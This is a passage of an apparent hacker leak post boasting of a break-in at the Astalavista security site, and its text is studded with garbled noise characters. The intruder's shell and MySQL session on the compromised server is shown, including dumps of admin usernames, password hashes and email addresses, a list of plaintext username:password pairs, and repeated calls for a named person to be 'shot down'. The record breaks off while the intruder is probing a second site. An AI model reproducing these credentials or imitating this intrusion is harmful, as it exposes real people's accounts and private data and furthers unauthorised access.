            $comExploits[$x]['status']    = ‘1′;! C2 G2 I  T* s' i
            $comExploits[$x]['changelog'] = $date;- G9 D! h( W  P% t: ]

# S7 h# U% J/ n' f5 T1 ]        }
% i9 e' {. h  ?6 C/ ~% }[snip]5 L& S/ S7 K' J) g4 `
    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
' O; ^0 c; U2 q4 `/ u: l  D3 c<rss version=”2.0″>
2 n* W$ n. w, }. M( |6 @    <channel>$ A7 X2 _' A( m+ w, e: X
        <title>ASTALAVISTA.com - Exploits</title>
1 P) _$ H# N5 S        <link>http://www.astalavista.com/exploits</link>, a! z7 X7 x+ Y- K9 R. K  A- X2 A0 t
        <description>All availably Exploits.</description>3 c% z9 r+ O) ^
        <language>en-us</language>
- c2 D5 \. @: V& b6 @        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
' W( G" i0 ^1 E- _% y        <docs>http://blogs.law.harvard.edu/tech/rss</docs>
- c. v$ E1 v+ k/ c        <generator>Astalavista.com</generator>  c. x! c' n6 m1 `! I5 c' R
        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘, `0 |9 z. R) B- y9 ?2 G( |
    </channel>
8 B7 l6 ]( j4 k) W9 H</rss>’;# k: Q3 I  P. R

4 _* d1 r1 G' z5 c    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {" h  I. C! `; v* n$ ]2 i. ~8 H4 O
        unlink (FULLPATH . ‘/feed/exploits.xml’);
( U6 X# Z" j1 z% d    }* Y/ [+ W2 c$ u# U6 T

/ V9 y. S& x. L  ]$ @+ T5 h0 y% f    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
, J+ z) {2 ^& y4 R$ z. K2 H[snip]3 N% t& Q) N  c/ ?7 z0 V

: \) _0 V0 c' E& Q& U: ^sh-3.2$ cat exploits.sh
- S: c# z7 O& j/ q, J#!/bin/sh
. ?0 [9 W) g4 D9 T
) n) v7 E; B4 f5 W0 P###########################################################! c+ l1 c& d, K. n- z
#                                                         #
! y8 n$ |1 I- Z5 J+ X! f#   Title:        milw0rm exploits adder                  #
( }( f6 y7 @/ U& h# L* M3 L#   Description:  Add all milw0rm exploits to the         #! Z$ ^) {" ^" z/ G5 ~
#                 Astalavista.com database                #
7 D3 }' I& r0 c#                                                         #/ A) ]9 R6 W" G! x
#   Company:      Astalavista Group                       #
& n2 |4 Q" ]% y- g#   Author:       Paulo M. Santos                         #
) d# {5 I5 ?# P# E  Q#   E-Mail:       链接标记paulo.santos@astalavista.ch             #. @* o. J4 s! c0 B% [
#                                                         #  }! Q8 E# n$ v  u5 C* ]. _
###########################################################. `- v- d( ~) k( t' t
5 h: }' |+ w: E% `( f- m  V! A
# path
, O' W: w* o0 q* X0 h' e  bthis_path=/home/com/public_html/modifications/cronjobs
6 T0 Z* T0 n8 U" n0 T
; C& R9 \0 v% p% b' [# change directory
, L& e' D4 Q( w8 _$ v+ Kcd $this_path1 H/ g3 b# l9 l  P
cd tmp/
! l, z, Y+ f9 ]! k8 f9 T  G
; D0 Z! I4 h2 Z# delete files
# i3 M# X+ D: _1 G4 |! irm -rf milw0rm.tar.* &1 E% Z; @' @- u# r
rm -rf milw0rm/ &  q3 U2 f: ~5 ]9 t
) w: \( F8 D: Z( E3 f' X
# wget milw0rm paket  b5 V1 o3 c  e$ Z! R
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]7 x3 ]# a) u" Q3 Y/ i' A
; K5 A! N1 x2 P1 Z. |8 l3 M
# extract milw0rm paket
+ j& f+ i; y. z/ O: ltar -xvf milw0rm.tar.bz2# l8 F$ d& e; V+ y) E3 |  d

* W9 H9 Y' o' \2 N  S# change owner
  O* U+ w. A5 q3 |( s- cchown -R com .& Q: @- V4 f! @* R0 b; z
chgrp -R com .$ Y/ T5 A" y, j

; q- x; _6 C- {% o  C) Q# execute php script
0 K. p2 d' x  `* ]cd $this_path  W: _8 P/ h9 j, h: Z6 }$ y& z/ f
php -q exploits.php
  @2 q; h) C# k( W& R
4 }9 c: v3 _9 _+ G5 q" d# delete files; T$ E- S' V" H% a$ A3 g
rm -rf tmp/milw0rm.tar.*
1 r+ a& q, k/ M: o/ M9 y  ]5 yrm -rf tmp/milw0rm/4 \2 ~5 ~( [: b: D; d
. w+ C( v! V) l5 Q, G( H) j3 V! ?
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
. Z: A) l3 j: U2 ]8 }& U9 DPaulo M. Santos needs to be shot down.
$ A; R, E# W0 Q6 u$ R* k4 x. J6 |0 [% v- d
mysql -u contrexxuser2 -p
6 y4 y( F  p. Q* I6 o7 {  LEnter password:. P) R$ i3 U; a- w. k$ w' Z
Welcome to the MySQL monitor.  Commands end with ; or \g.
4 j6 Y2 `) ~- _( S# @. M- JYour MySQL connection id is 261694
4 U8 S+ H# a" Z% ~. Q+ D7 i" N6 IServer version: 5.0.45-community-log MySQL Community Edition (GPL)
; Y* S- y6 ~. p, J% N- n9 q8 ~% f
% y! K) D& x% o& {$ ~- `* CType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
( U$ u* w6 y# v  `. j7 E1 n- s5 n9 {- b' d
mysql> show databases;, c3 r6 m7 f5 i7 N3 S" _1 C7 m
+——————–+" b/ T0 J1 D3 E. _7 t, V
| Database           |
4 Y2 H& U' L+ S. o, M1 ^+——————–+
; z+ W6 U9 X7 g- q( V  G6 _| information_schema |) d  z' K. T" e' M$ R  z2 ?
| com_contrexx2      |
/ L/ E. ]2 P' U0 q: p| com_contrexx2_live |
  W" g. `. i/ r$ Q| test               |' P6 W) a$ ]7 M- V2 H
+——————–+
) H+ d: U. H: v7 Y3 c9 l/ Y% O4 rows in set (0.00 sec)0 L: S9 W( J. _

! j8 T; t+ I) I/ qmysql> use com_contrexx2_live$ Z$ b+ U' F! W2 P' g
Database changed  i5 s9 y' K: |2 d  J2 `* X
mysql> show tables;! j5 x- v3 ?: Z+ n% g3 E; v
+————————————————–+7 U( E! e( R- c: j
| Tables_in_com_contrexx2_live                     |
( ~8 a* ?9 R4 s7 e- P+————————————————–+" ^$ x! {4 l4 b! [, n% W
| cc_banner_counter                                |
2 s9 P0 U# W1 h7 B! Z2 A9 || cc_search_counter                                |
1 c5 }, A8 S: [( X: x! k  J| contrexx_access_group_dynamic_ids                |' `  O& T$ F" U$ r/ b
| contrexx_access_group_static_ids                 |0 g9 K9 _: T3 Y: V
| contrexx_access_rel_user_group                   |
7 j0 ]- L$ q! D; a, B2 U( A| contrexx_access_settings                         |
! G2 y# Y1 R  ~, {# h| contrexx_access_user_attribute                   |) [: Y5 r1 F6 U$ \+ e8 x" I' d8 K! [
| contrexx_access_user_attribute_name              |( q& S+ ]/ o: q: N/ h2 J
| contrexx_access_user_attribute_value             |, ]8 J( Z- k. g/ {, G$ b) V
| contrexx_access_user_core_attribute              |6 T' |7 H6 H& _! X) D, Y
| contrexx_access_user_groups                      |
  [/ {9 V+ Y4 t| contrexx_access_user_mail                        |
6 f+ r8 b6 b2 B* f! z) B3 j5 J" b9 B! [| contrexx_access_user_profile                     |! |( K! s+ }# G% B5 I5 q$ G
| contrexx_access_user_title                       |# B0 E) b% |% {5 H0 N
| contrexx_access_user_validity                    |
6 }0 a1 X  D" k| contrexx_access_users                            |
% s( I3 x, t' c| contrexx_backend_areas                           |
! x# E. p' D% B0 T+ o% \' l| contrexx_backups                                 |7 @3 ^4 t, j# g
| contrexx_content                                 |' a) g( }7 H- T8 V2 p$ j
| contrexx_content_history                         |
1 o4 e( ]# g6 E| contrexx_content_logfile                         |" G: q8 k" [: K' ?
| contrexx_content_navigation                      |
8 L8 K1 G7 ]2 o; l8 m+ Q3 ~0 s8 |9 v| contrexx_content_navigation_history              |
- q3 d( o0 C" K. Y, y| contrexx_ids                                     |+ O$ E1 Q$ [4 b& o' ]
| contrexx_languages                               |  x4 Y/ z5 {! h
| contrexx_lib_country                             |
) w- S' f- s& s| contrexx_log                                     |* ]8 ~) ?- }* t0 i) Z1 z+ J2 W
| contrexx_module_alias_source                     |. h7 e2 Y: R& u( q8 B8 F2 ]
| contrexx_module_alias_target                     |
/ m  |5 a5 P" U3 z+ _' k9 i& X| contrexx_module_block_blocks                     |
* X! F. _' P2 K1 W% e7 Z. ?| contrexx_module_block_rel_lang                   |2 U6 {# b+ r$ p* `. R: r6 b6 ]" g3 T
| contrexx_module_block_rel_pages                  |
, P/ x$ y3 a: \% g& x| contrexx_module_block_settings                   |
+ e5 z2 @% y- b| contrexx_module_blog_categories                  |
7 {( h+ b1 R% b) V/ b| contrexx_module_blog_comments                    |& l- c7 W; a5 @5 {9 u; q
| contrexx_module_blog_message_to_category         |, \8 Y; t  }- h1 M7 w
| contrexx_module_blog_messages                    |7 q+ j+ G0 d6 k4 H# z3 i
| contrexx_module_blog_messages_lang               |
3 L+ n3 A& }. r$ N- o: F2 @/ @, W1 z$ l| contrexx_module_blog_networks                    |
) `: B1 o  X$ r| contrexx_module_blog_networks_lang               |8 m8 w8 |1 l% _" n) G* P2 R
| contrexx_module_blog_settings                    |
/ W9 j8 M) i' ^1 J8 e) _; b| contrexx_module_blog_votes                       |" ?+ a; t. f- C
| contrexx_module_calendar                         |! G( U. l& F4 |" R1 n- k
| contrexx_module_calendar_access                  |
; f, W$ ^* O! F# A2 x| contrexx_module_calendar_categories              |
9 |0 }- f* H' {0 h# r8 V6 E; p4 e| contrexx_module_calendar_form_data               |1 n4 s1 g! H; C- c' M$ V
| contrexx_module_calendar_form_fields             |
6 O# `0 U; }- P5 N" D, }# f| contrexx_module_calendar_registrations           |1 [3 f- X7 p  J9 ^' A8 l2 Q" R
| contrexx_module_calendar_settings                |
$ o$ r' S" h  p; a" k5 f| contrexx_module_calendar_style                   |; f: X: a- n9 \1 K
| contrexx_module_contact_form                     |1 u* d! [: G# `
| contrexx_module_contact_form_data                |1 P/ y, Y: |+ j: P7 ^8 Y& y- j
| contrexx_module_contact_form_field               |  b( g/ A! W. s9 w! A8 B' m$ j9 ~. l
| contrexx_module_contact_settings                 |5 m9 t: o) @0 U9 r- x
| contrexx_module_data_categories                  |
1 M7 A1 k3 W- `2 H; D| contrexx_module_data_message_to_category         |0 D( g( a* _% s0 p  ]
| contrexx_module_data_messages                    |
+ U4 d& M7 }; w; u0 f| contrexx_module_data_messages_lang               |
' B+ x" C& M) B1 f9 E/ _/ r| contrexx_module_data_placeholders                |+ b  K& M8 e  n# @% @' u; C" u9 p2 Y
| contrexx_module_data_settings                    |
9 C$ f# n5 q! ?* d% C3 d| contrexx_module_directory_access                 |* |0 Q+ }* V7 u( M! s3 H  ]2 Y0 n; G5 H
| contrexx_module_directory_categories             |6 |5 i. J2 X0 x8 z9 d& n; |9 x
| contrexx_module_directory_dir                    |
1 J. |1 f, I! r. _% E; `| contrexx_module_directory_inputfields            |# L$ y6 w6 p! r7 e+ r6 T) g7 d
| contrexx_module_directory_levels                 |3 t' d% y4 [# |8 G- L0 X
| contrexx_module_directory_mail                   |- s* M# Q7 h) F
| contrexx_module_directory_rel_dir_cat            |
- Q" g- S! {  y| contrexx_module_directory_rel_dir_level          |6 O6 a; Z. R1 g
| contrexx_module_directory_settings               |
# T: [- c8 e7 J| contrexx_module_directory_settings_google        |4 O2 M. D2 a- }# n% P- X) m& X: t
| contrexx_module_directory_vote                   |
2 F4 n5 K% K- v: D4 }3 @# U5 K| contrexx_module_docsys                           |
3 M5 J+ S3 V+ [/ Q. z| contrexx_module_docsys_categories                |
0 m/ e1 e. i& ?: X| contrexx_module_egov_configuration               |
5 f& @# \" B& I| contrexx_module_egov_orders                      |& m) K- u# o8 ^
| contrexx_module_egov_product_calendar            |- A2 Q. c0 m: Q! a
| contrexx_module_egov_product_fields              |+ {; Z! g" N/ n
| contrexx_module_egov_products                    |
# u. u5 G. K# g0 @0 Y5 u| contrexx_module_egov_settings                    |% \- x+ k7 K9 N
| contrexx_module_exploits                         |% {8 d! M5 M- B2 X+ a; I$ v% K
| contrexx_module_exploits_categories              |
  N2 F; h5 `3 r" E| contrexx_module_feed_category                    |
. o: `+ U2 q! q% [: {| contrexx_module_feed_news                        |
- z  I2 ?. Z$ K$ u| contrexx_module_feed_newsml_association          |, n! t0 l; h( u+ C- e
| contrexx_module_feed_newsml_categories           |
$ b8 J+ S% v' w  x| contrexx_module_feed_newsml_documents            |
7 u! e, U4 y' _7 }| contrexx_module_feed_newsml_providers            |
, L2 l, j$ C# J" c% ?7 @5 ^' m| contrexx_module_forum_access                     |* _1 w( H& @- v( u8 g" e+ N6 {
| contrexx_module_forum_categories                 |
  R% W3 M1 ~' b' m( L' s6 I| contrexx_module_forum_categories_lang            |- r6 e4 j' \5 E# x3 ]! H
| contrexx_module_forum_notification               |
, a9 g  _4 t3 P( Q) M| contrexx_module_forum_postings                   |# e2 N$ U' f' q: ^' Q
| contrexx_module_forum_rating                     |4 [* Z, {- T+ T& L. L) `, ]
| contrexx_module_forum_settings                   |
! G. U7 W7 i% N% U* v7 d; H$ s1 R$ I| contrexx_module_forum_statistics                 |
  _0 A) j8 x" v" z  ?1 m| contrexx_module_gallery_categories               |# |6 K8 x3 ^" i& B0 r! E9 J
| contrexx_module_gallery_comments                 |' H' U/ q8 }. u
| contrexx_module_gallery_language                 |
8 E$ ^* t  k. z; s: S| contrexx_module_gallery_language_pics            |
/ |# [) }& N8 M0 u8 t+ Z' v5 T7 k| contrexx_module_gallery_pictures                 |( b" A; G( [" Q. m
| contrexx_module_gallery_settings                 |
+ ^( {. H; ]2 Z3 Y4 K* n. u+ ]| contrexx_module_gallery_votes                    |. U2 S3 P, e/ ~
| contrexx_module_guestbook                        |. u4 n& g4 X; H- D
| contrexx_module_guestbook_settings               |
, D  q) U) A* L% t5 `: {- c8 X3 }| contrexx_module_livecam                          |
+ j+ G" L/ K. o| contrexx_module_livecam_settings                 |3 K2 n# f+ {. v: h- ^+ r
| contrexx_module_market                           |# c* z, Z/ e# Z) D0 p  D
| contrexx_module_market_access                    |
& b6 R1 D2 ]1 Q" v6 }$ `| contrexx_module_market_categories                |2 g/ [" U$ o/ ^
| contrexx_module_market_mail                      |
) D6 ?7 ?9 d' `0 V| contrexx_module_market_paypal                    |1 S& Q8 v; }# h' E) l6 A. D
| contrexx_module_market_settings                  |, ~; j6 w# Y7 E
| contrexx_module_market_spez_fields               |( Q0 j9 B) e; G! l9 b
| contrexx_module_mediadir_access                  |" J7 p! T% Y* E
| contrexx_module_mediadir_categories              |
6 A4 C& i" l2 L5 H| contrexx_module_mediadir_comments                |
& A. \8 @: \  ^| contrexx_module_mediadir_dir                     |
- t: Z# ?- f. M| contrexx_module_mediadir_inputfields             |% Q8 a6 y! A. N1 s0 O/ m9 C. h
| contrexx_module_mediadir_levels                  |
& v) ~" e! o* \  i7 B$ J3 K| contrexx_module_mediadir_mail                    |1 E( s# [0 Y- v
| contrexx_module_mediadir_rel_dir_cat             |
& v  E. R# N! E) Y. p. x| contrexx_module_mediadir_rel_dir_level           |/ i1 j# X6 _& G3 z
| contrexx_module_mediadir_reports                 |' k# [; I: r) E8 I' S
| contrexx_module_mediadir_settings                |
- d; E$ ^' K; k: c$ c8 @- s, Y| contrexx_module_mediadir_settings_google         |, U7 P! l: H1 Y/ y& Q9 n
| contrexx_module_mediadir_vote                    |) X1 l  X; g: n' D5 Q8 e
| contrexx_module_memberdir_directories            |
: H* P1 X9 E' y0 A| contrexx_module_memberdir_name                   |1 F3 q; R) p! l% u
| contrexx_module_memberdir_settings               |- J0 i4 @1 d7 V
| contrexx_module_memberdir_values                 |
) _( T# r% b( I' ^# j( S| contrexx_module_nettools_allowed_groups          |, K8 E+ J% t3 F
| contrexx_module_nettools_settings                |3 a% B9 B: V2 U# M2 l
| contrexx_module_news                             |- p# q" e5 g1 Z# I) J* @
| contrexx_module_news_access                      |
9 ?: Q6 f1 l! ~( P| contrexx_module_news_categories                  |
9 M8 x3 `3 a6 [; s- r4 R& v: s: Q| contrexx_module_news_settings                    |
2 s5 t9 I& G6 ?# ^) Z| contrexx_module_news_teaser_frame                |6 }1 D6 u' R! u! n3 I. O" `
| contrexx_module_news_teaser_frame_templates      |
( f  K5 g) l5 w) s* s, E| contrexx_module_news_ticker                      |
9 e5 z5 C+ y* [3 R7 \7 c| contrexx_module_newsletter                       |
$ `6 C# [# P$ q: p| contrexx_module_newsletter_attachment            |
0 ]7 f/ }! n8 ~" B! x* P| contrexx_module_newsletter_category              |
0 X# o: _" P- @7 ^| contrexx_module_newsletter_confirm_mail          |0 ~# I( ?& R3 p" k( c
| contrexx_module_newsletter_rel_cat_news          |
# Z. m/ g5 H  R& C$ i| contrexx_module_newsletter_rel_user_cat          |
! n' n% O' k; l7 c) V| contrexx_module_newsletter_settings              |9 F( L3 d! X' R) J# Q& L
| contrexx_module_newsletter_template              |
, i7 f; e1 E2 Y+ n7 l' {| contrexx_module_newsletter_tmp_sending           |
3 ?( ]( O: J5 p+ }  |- F| contrexx_module_newsletter_user                  |
6 @6 i; b& M. Y7 S$ v9 E| contrexx_module_newsletter_user_title            |2 X% Q  T/ z& F5 o8 S
| contrexx_module_onlinetools_defaultports         |' p  ?2 i* ~5 [
| contrexx_module_onlinetools_defaultports_back    |" b6 Q( ~7 A% ]8 `
| contrexx_module_onlinetools_geolitecity_blocks   |
! L' N$ m3 I; h| contrexx_module_onlinetools_geolitecity_country  |$ @3 z) ]4 @5 C( o/ E
| contrexx_module_onlinetools_geolitecity_location |, J" G  S- ]! r) I" Y& a# U4 I
| contrexx_module_podcast_category                 |
" ]2 h: {3 _) q4 o% d8 h3 Z| contrexx_module_podcast_medium                   |6 v$ ~; E3 ?8 n+ d7 @: D) F# X
| contrexx_module_podcast_rel_category_lang        |
2 h1 \. ~4 L' F( K8 s| contrexx_module_podcast_rel_medium_category      |& g) r; a- f; R6 k
| contrexx_module_podcast_settings                 |
' ]0 ]. U; |& ?4 R4 \  \| contrexx_module_podcast_template                 |
4 {, t% [+ l, V6 i% h" H| contrexx_module_proxydb                          |- ^" L0 P, I6 }& j
| contrexx_module_recommend                        |
! X# v# T5 Q8 W" A$ P| contrexx_module_repository                       |
* ]; W0 l* I" ?9 \+ ~  h1 P| contrexx_module_securitynews_cats                |! v% F1 y* z# _9 |/ U. T+ i% Z
| contrexx_module_securitynews_feeds               |
' D3 o' C; o5 l3 c4 \| contrexx_module_securitynews_news                |
( O! v  O2 O7 f; U. ^7 G! c| contrexx_module_shop_categories                  |. K( B/ E" W6 D6 A7 A' [
| contrexx_module_shop_config                      |3 P" h; l: D0 ^( {2 A
| contrexx_module_shop_countries                   |
7 S4 L8 S2 L2 f+ l| contrexx_module_shop_currencies                  |
/ {: Q1 f9 a! c5 e- n# x6 o| contrexx_module_shop_customers                   |
  R; H. s8 i4 Y  @8 R" h; j1 R7 A/ \| contrexx_module_shop_importimg                   |
. V  [+ N3 [( D3 N( m3 Y/ @' N# v| contrexx_module_shop_lsv                         |
( ~, U) d5 z4 Z) `$ u$ r9 E| contrexx_module_shop_mail                        |
. L/ l1 d7 y0 h, t" L| contrexx_module_shop_mail_content                |" C- {' j5 ?% E. S+ _& R
| contrexx_module_shop_manufacturer                |5 s: Y% K) k- l
| contrexx_module_shop_order_items                 |
. ]  \" X7 m( v. v. j/ o| contrexx_module_shop_order_items_attributes      |6 ~0 j5 z+ H, \8 k1 o) @
| contrexx_module_shop_orders                      |
- @7 m# r# P) Y) F6 g" K| contrexx_module_shop_payment                     |
" r3 T9 n+ s/ Y| contrexx_module_shop_payment_processors          |
6 {4 |+ T1 S8 Z! T| contrexx_module_shop_pricelists                  |/ S2 G2 C- C/ @2 ]; y% S% o7 \
| contrexx_module_shop_products                    |
! d6 b' `8 I8 R7 {| contrexx_module_shop_products_attributes         |
) X8 C/ W( \1 B, a$ G| contrexx_module_shop_products_attributes_name    |
% A  Q! R; }: g' A8 J| contrexx_module_shop_products_attributes_value   |
, O: c: K7 T6 V4 r& u| contrexx_module_shop_products_downloads          |
0 `% ^9 _4 Y( F) l- H. u: J7 G| contrexx_module_shop_rel_countries               |
9 O* ]1 P0 `+ L! ]6 X% `2 o  Y| contrexx_module_shop_rel_payment                 |. _: g- }, I$ A
| contrexx_module_shop_rel_shipment                |
/ @. I* }1 x) Q' Y: U3 H| contrexx_module_shop_shipment_cost               |
, G# j1 k5 g1 Y( n, @# f8 y| contrexx_module_shop_shipper                     |
1 W# ^6 o% P. T| contrexx_module_shop_vat                         |% z. Z5 M, `1 ~" P) ^
| contrexx_module_shop_zones                       |
& b" P1 o  c3 G| contrexx_module_u2u_address_list                 |
' E! h3 Q) \8 l0 E2 [: s| contrexx_module_u2u_message_log                  |
. O0 p" Q2 w# h  Z" Y0 @- a| contrexx_module_u2u_sent_messages                |. V) v+ f8 D, v3 s6 t# @. H0 t
| contrexx_module_u2u_settings                     |
- H/ u, Z0 \" c( M5 t) w* Q| contrexx_module_u2u_user_log                     |6 A6 F0 f8 p, H
| contrexx_modules                                 |
) O1 Q, v2 _4 `" [1 @# T: O| contrexx_sessions                                |
( r9 c! o, a7 }- E6 P| contrexx_settings                                |4 d9 B3 V1 c$ g  W
| contrexx_settings_smtp                           |
! |" A6 }8 L( j6 O$ }. ]* Y" n/ ^| contrexx_skins                                   |2 q: S; d, Y9 |. F3 w8 R, e
| contrexx_stats_browser                           |
9 z# E  u9 O0 W% d| contrexx_stats_colourdepth                       |$ l  t/ r" e( T' c
| contrexx_stats_config                            |
/ h; z" M7 ^1 h" ^( h! G  X| contrexx_stats_country                           |$ [9 b! C# L% t
| contrexx_stats_hostname                          |
- m% g9 N$ M+ M( y/ O6 W% ]  O$ d9 G| contrexx_stats_javascript                        |
9 }6 o2 O1 _4 _! e" I! J| contrexx_stats_operatingsystem                   |
$ J- F) g% J1 d. U| contrexx_stats_referer                           |
* q3 }0 [( o8 f4 s| contrexx_stats_requests                          |
5 F5 g5 n! }9 L2 U- a5 T4 p2 M| contrexx_stats_requests_summary                  |  ^9 d: M, _' c8 S+ p7 c$ i3 B
| contrexx_stats_screenresolution                  |4 P) v8 k+ ^# o9 E- [
| contrexx_stats_search                            |' |1 e' d, {' G$ ~
| contrexx_stats_spiders                           |
* W; X& D& z# I| contrexx_stats_spiders_summary                   |
/ m8 m. X: o1 B, m| contrexx_stats_visitors                          |) p6 f$ V2 N6 g+ y0 V: s* o
| contrexx_stats_visitors_summary                  |- H- d2 y# B  j$ S  k4 A; Y! F
| contrexx_voting_additionaldata                   |5 V4 M3 D) |! m# ]- u6 z
| contrexx_voting_email                            |3 S/ L  U; q( Y6 X* _" W( a4 s8 f
| contrexx_voting_rel_email_system                 |
3 C4 Z* N. m3 p; ]* w* r7 `* r| contrexx_voting_results                          |- N" d$ E/ Z* Y3 G1 |- [- W5 m
| contrexx_voting_system                           |5 Q' X$ o6 G; e/ h
| foo                                              |
* D; \# f/ r3 p+————————————————–+6 j3 \5 w- v& ]  T5 ]8 h- y
227 rows in set (0.01 sec)' t  P4 Q9 }. d4 Z" E) M2 C

7 x) i3 K& B$ w1 a, V* x7 @7 wmysql> select count(*) as skids from contrexx_access_users;6 ]7 T  {" n' U2 i# m7 b, Z  f9 H9 d
+——-+7 r, Z4 }3 e- V0 g4 ^5 Z
| skids |
2 y% c) Y$ h9 N/ C% G+——-+
/ K( U. d9 ~9 w; ?0 [| 53699 |  i6 f3 m9 H) ~# u" F" P/ i
+——-+
) ~8 M4 _9 f$ n1 row in set (0.00 sec)
. k/ G& |" O4 c6 `$ T0 ]0 K6 x7 u" r! N
mysql> describe contrexx_access_users;
& ~. N5 _! `* y8 m+——————+——————————————+——+—–+————–+—————-+
: A1 x# y* Y6 D, I4 m; C| Field            | Type                                     | Null | Key | Default      | Extra          |7 r6 }. T9 I5 J* y- S
+——————+——————————————+——+—–+————–+—————-+
: ~2 ~+ q( {% i0 g| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |* b3 @/ g6 z& k2 O! c# U2 X
| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |
" S* {  `7 V& e5 C  f% a2 `! ?| username         | varchar(40)                              | YES  | MUL | NULL         |                |
' ]' G; M/ A+ D2 g| password         | varchar(32)                              | YES  |     | NULL         |                |
8 l5 B6 c8 n  ?9 G9 h| regdate          | int(14) unsigned                         | NO   |     | 0            |                |
" h4 i; F$ l* s3 j0 b) w5 [5 A| expiration       | int(14) unsigned                         | NO   |     | 0            |                |% ~/ K' l- [- e' [6 W1 H( J
| validity         | int(10) unsigned                         | NO   |     | 0            |                |0 x8 A5 s6 Z3 m+ w& a/ ~
| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |
" {7 u/ S9 U: q  ^9 Z) ^| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |
, B% l2 J& x, c, ?: r* A# G| email            | varchar(255)                             | YES  |     | NULL         |                |
7 {% x6 q8 d1 `, h! [| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |  a6 [1 B3 }2 i% R# k
| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |  n4 `+ o3 I8 g5 q1 ^7 }
| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |
. `1 M% \  K: t0 D' R| active           | tinyint(1)                               | NO   |     | 0            |                |# @$ g9 \; ~# @% I% g( W
| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |
% a- P3 i# f) Q8 L$ G' l/ {| restore_key      | varchar(32)                              | NO   |     |              |                |$ {. ]" b* \! p% |0 j  `
| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |! O9 T  N8 h* h, m
| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |
& h! v2 D& W$ q( z8 d; q+ I+——————+——————————————+——+—–+————–+—————-+
# }% A( g, ^0 c" S& O18 rows in set (0.00 sec)
* w$ H0 x( d* Y" h
- Q' f5 a* X" r/ C6 Y/ smysql> select username,password,email from contrexx_access_users where is_admin = 1;* E5 `% G2 p. i, C  e
+————+———————————-+—————————–+5 Z) M3 Q) e5 [' F: W: v4 I. _# Q. l0 P
| username   | password                         | email                       |7 {  C( W: Q. }, L6 Q6 u4 f- u! Y
+————+———————————-+—————————–+
  l4 V# y$ f( i2 k: n1 l| system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |
# q" @6 d3 S) A1 B, R| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |$ }  C4 ^& G& w0 k. Z0 Y* N
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
' C6 {/ M/ O4 y$ h* ~9 ?| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |6 R# \+ T2 s) P2 [3 E
+————+———————————-+—————————–+% Z. h; `) H% I1 r) u# P- Q1 ?4 Q
4 rows in set (0.04 sec)& m. w  |% I# k% m8 O' d& ]
' Q% I# J& @2 o% a
mysql> exit;
& M- ^. O4 r2 c0 TBye
( [* z& L# C9 N  @2 w( l3 R! U% ^
[~] There you go, your “team of security and IT professionals” is a joke.5 t& c5 ~& Z: _: }9 G% X; ]! d2 x
$ }$ w  a6 I8 ?  s
+——————————+
6 Z" y$ a! _2 csystem:f82BN3+_*1 \4 L! L1 V% N5 E" V- H; `
Be1er0ph0r:belerophor4astacom
4 g# X" b1 D3 X5 t  `0 m' g6 }prozac:asta4cms!8 G. A1 }5 L4 ~1 c$ f
commander:mpbdaagf6m
# j* d' Q+ U! Lsykadul:ak29eral+ [9 t4 I7 k7 g9 W/ M. E# _% F( d
+——————————+/ d; _9 ?5 A6 B4 |& o) e: Q

- {( F" A9 X" a  M' i3 i) y[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
! A' n2 h  R- p  u…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
4 Q! R3 J9 S0 ^& c  \
9 ]1 C% S% r& `4 T$ D" r# H[~] Lets move to astalavista.net now,3 @; H+ X7 o# [. o
5 K6 k8 G) o7 s+ K2 G
From <链接标记[url]https://www.astalavista.net/[/url]>:# }; [7 b+ N6 q9 O+ c5 e+ s9 T
>> Everyone knows that the best defense is a good offense.' D4 d6 c. y8 v% q
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.6 S# V. N0 a4 H3 m  A# c7 c- F; ?
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.! y% `6 R' e& |. f* H6 Y: g% D
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
1 D+ \5 H, V* A. w6 ^; {  J1 i0 [8 ~5 i
>> Go ahead, try and hack our server . in a completely legal way!$ p! |5 S" r; {
>> Learn by doing: We offer our members tricky tasks and challenges on an
, O. Y& n$ e7 t5 r>> ongoing basis so you can test your knowledge and abilities. You can also
6 \7 V# N1 i* x; J>> demonstrate what you.ve mastered by taking part in regular hacker contests
0 l' i" L& X; s/ x>> and war games
& }& j4 d% @& Z% W3 A* b4 X- i+ x
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!7 v$ z- W; s2 ^1 K
; T1 M/ k/ s4 h' l
[-] Tricky task: Find home dir of astalavista.net) G; F/ ?+ w5 U+ |
8 m( K8 h4 w+ A1 p1 d) J+ o
sh-3.2$ ls -la ~astanet7 \2 k2 _9 K0 j* W" o
total 48
' N7 E& M& L: }5 Q: ~9 R& F/ xdrwx–x–x  6 astanet astanet 4096 Dec 23 15:55 .4 z( r- Z2 `& J/ m3 j
drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
